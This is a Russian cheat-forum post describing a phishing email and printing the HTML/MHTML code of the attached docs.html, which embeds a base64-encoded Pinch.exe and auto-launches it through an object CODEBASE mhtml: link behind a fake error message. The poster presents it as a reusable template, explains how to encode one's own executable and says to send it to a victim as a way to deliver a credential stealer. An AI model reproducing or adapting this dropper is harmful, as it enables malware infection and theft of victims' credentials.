Запуск Ехе-файла через Html страницу [Без софта] - Форум - Cheat-Master.Ru | Читерский Форум | Читы для SAMP,CS,Minecraft,CoD,Warface | Продажа аккаунтов SAMP,WoT,Steam,Origin,Warface | Баги,статьи SAMP-RP,Advance-RP,Diamond-RP | Магазин аккаунтов SAMP-RP,Advance-RP,Diamond-RP,Steam,WoT,Warface

Страница 1 из 11
Модератор форума: [CM]Russel 
Форум » Общение, флуд, оффтоп » Разное » Запуск Ехе-файла через Html страницу [Без софта] (Запуск Ехе-файла через Html страницу [Без софта])
Запуск Ехе-файла через Html страницу [Без софта]
Sargon™Дата: Суббота, 22.10.2016, 20:25 | Сообщение # 1
Новичок
Группа: Заблокированные
Сообщений: 3
Статус: Offline
Войдите на сайт или зарегистрируйтесь для просмотра полного содержимого темы.

Сидел я и ползал по просторам интернета и решил проверить свой почтовый ящик.
Там оказалось недавно пришедшее письмо странного содержания.
В начале втирали про что-то на русско-английском языке, а потом такая фраза: "Я слышал, что ты болеешь.
Выздоравливай скорее!". Примерно так. Что за чудо, я не болел уже давно.
К письму был прикреплен архив, защищенный паролем.
А пароль был в тексте письма: docs. В письме говорилось, что в архиве лежат пароли боссов.
Пароль к архиву подошел, и передо мной предстал ни в чем не повинный html файлик объемом всего в 15 килобайт.
Ну естественно запускать я его не стал, а нажал "F4" (в Total Commander'e).
Откылся Блокнот, с содержанием файла docs.html.

Код
MIME-Version: 1.0
Content-Location:file:///Pinch.exe
Content-Transfer-Encoding: base64
[BINARY TEXT VIRUS]
<title>Welcome - Home</title>
<body bgcolor=black scroll=no>
<script>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write( ' <title>Welcome - Home</title>
<body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">
Sorry, Error On This Page! Please Open With Internet Explorer</center>
<object style="cursor:cross-hair" alt="Sorry, Error On This Page!
Please Open With Internet Explorer" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\docs.html!file:///Pinch.exe">
</object>' <img src="/.s/sm/2/wink.gif" border="0" align="absmiddle" alt="wink" />
}
setTimeout("malware()",150)
</script>


Строка [BINARY TEXT VIRUS] означает, что на этом месте был закодирован exe файл вируса, вставлять я его не стал, уж слишком много места займет.
Перед вами макет автозапуска вируса из html файла.
Его можно использовать и для ваших творений.
Просто замените текст [BINARY TEXT VIRUS] на ваш код exe файла.
А код можно легко получить следующим образом...
Зайдите в почтовый клиент и нажмите "Написать новое сообщение", в открывшемся окне щелкните "Вставка" -> "Вложение файла".
Теперь "Файл" -> "Сохранить как...". После сохранения письма, его нужно открыть в Текстовом редакторе и вырезать тот самый код exe файла.
И все,отправляем жертве. Хороший способ для отправки стилера.
Ccылки
Найти еще что-нибудь в магазине:
Форум » Общение, флуд, оффтоп » Разное » Запуск Ехе-файла через Html страницу [Без софта] (Запуск Ехе-файла через Html страницу [Без софта])
Страница 1 из 11
Поиск:
Статистика Форума
Последнии темы Читаемые темы Лучшие пользователи Новые пользователи
Продам два аккаунта на Ev... [JonStiv]

☢Продажа вирт на Grand Rp... [nazar26rus]

Смешаные логи | 2096... [ZaShmal]

[CLEO PLUGIN] SAMPFUNCS 5... [SeemsGood]

Utah Roleplay [500р] [batrudov7]

[EvolveRP] Баг с дальнобо... [ulan55]

Продам акк DRP ONYX [Matejka]

Продам игровую валюту на ... [artem_makeev1998]

[GTA Online] Сессия для н... [Purum]

✔ PC/PS4/XBOX1 GTA V ONLI... [ThеBrainDit]

[1]>S0beit - pr9n project for samp 0.3.7 [9446]

[2]>RakBot 0.6.6 - прокачка аккаунтов без GTA [9191]

[3]>Часто задаваемые вопросы... [8124]

[4]>Успей купить. 1кк 350р !!!!!!! [7562]

[5]>Вопросы и ответы [6261]

[6]>[0.3.7][RUS] Sobeit modified by MishaN [6147]

[7]>Продажа вирт 1кк АРП~400р ДРП~400р.СРП~150р. [5971]

[8]>SAMP-Bot 0.5.9 by Jamely [4656]

[9]>Бесконечное слово [4549]

[10]>[Samp-Rp.Ru]Обновлен список Админов (27.01.2016) [4117]

[11]>[CLEO] Вопрос - Ответ [4038]

[12]>Курилка [3149]

[1]>АК_47 [23098]

[2]>GеNius [6410]

[3]>romka619 [5375]

[4]>[CM]AGRESSOR [4590]

[5]>baffometi [4422]

[6]>[CM]Russel [4151]

[7]>Snake_Firm [4133]

[8]>Artem_Buero [3966]

[9]>sky_Woker [3030]

[10]>[CM]Durman [2938]

[11]>iMaddy [2853]

[12]>Sa1nteD [2622]

[13]>zetkolya [2529]

[14]>Logan™ [2499]

[15]>Ch0c0Cube [2409]

JonStiv [28.02.2017|11:28]

Егорка1999 [28.02.2017|11:25]

carbon4ik1337 [28.02.2017|11:24]

boris_41rus [28.02.2017|11:15]

SuicideBoys$$$ [28.02.2017|11:13]

Meiras22 [28.02.2017|11:09]

sweet1803 [28.02.2017|11:00]

flyyaka [28.02.2017|10:55]

flakon4ik1488ss [28.02.2017|10:51]

Magistr_Yogurt [28.02.2017|10:50]

Murka111 [28.02.2017|10:47]

Чигирь228 [28.02.2017|10:41]

vartazaryan1488 [28.02.2017|10:41]

Dakir [28.02.2017|10:40]

YazaQuito [28.02.2017|10:36]


CM Team © 2009-2017 Администрация не несёт ответственности за размещённые материалы. Условия пользования
Все материалы предоставлены в ознакомительных целях и администрация предлагает удалить их после ознакомления.

Положение о защите персональных данных на сайте, Пользовательское соглашение, Договор оказания услуг.